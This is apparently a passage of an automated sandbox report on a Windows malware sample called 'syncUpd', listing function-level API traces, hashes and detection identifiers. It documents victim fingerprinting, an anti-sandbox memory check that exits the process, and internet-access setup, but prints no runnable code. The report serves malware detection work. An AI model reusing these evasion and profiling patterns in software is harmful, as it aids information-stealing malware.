                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009646A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                                              • Opcode ID: d09925fd7800ae11ecd0c951c3039c3b7733374e7b6ec90e923639f19283a629
                                                                                                                                                                                                                                                              • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d09925fd7800ae11ecd0c951c3039c3b7733374e7b6ec90e923639f19283a629
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1077 4011e0-401207 call 415090 GlobalMemoryStatusEx 1080 401233-40123a 1077->1080 1081 401209-401231 call 41a0b0 * 2 1077->1081 1083 401241-401245 1080->1083 1081->1083 1085 401247 1083->1085 1086 40125a-40125d 1083->1086 1088 401252-401254 ExitProcess 1085->1088 1089 401249-401250 1085->1089 1089->1086 1089->1088
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00960AA8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009651C8,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                              • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1091 414300-414343 GetProcessHeap HeapAlloc RegOpenKeyExA 1092 414362-414372 RegCloseKey 1091->1092 1093 414345-41435c RegQueryValueExA 1091->1093 1093->1092
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00960A38,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00964898,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                              • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,00960A38,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,00964898,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,00965048,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0095DBD0), ref: 0041438F
                                                                                                                                                                                                                                                                • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,00965048,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0095DBD0), ref: 00414396
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 00414542
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,009650A8,00000000,?,0041D76C,00000000,?,00000000,00000000,?,00964790,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,00960AA8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,009651C8,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                                                • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00964718,00000000,?,0041D774,00000000,?,00000000,00000000,?,00964778), ref: 0041496D
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,009620A8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                                              • String ID: E.A
                                                                                                                                                                                                                                                              • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                                              • Opcode ID: 4f11f7d606cdcca733d3e5a0bfdd28226123bb9e0771b4cb204d51c444cdd33f
                                                                                                                                                                                                                                                              • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f11f7d606cdcca733d3e5a0bfdd28226123bb9e0771b4cb204d51c444cdd33f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                                                              • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                              • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: e845ea52186ef1571e92f44797272c076a08a7f081748c8257e0410e0635b5e1
                                                                                                                                                                                                                                                              • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e845ea52186ef1571e92f44797272c076a08a7f081748c8257e0410e0635b5e1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
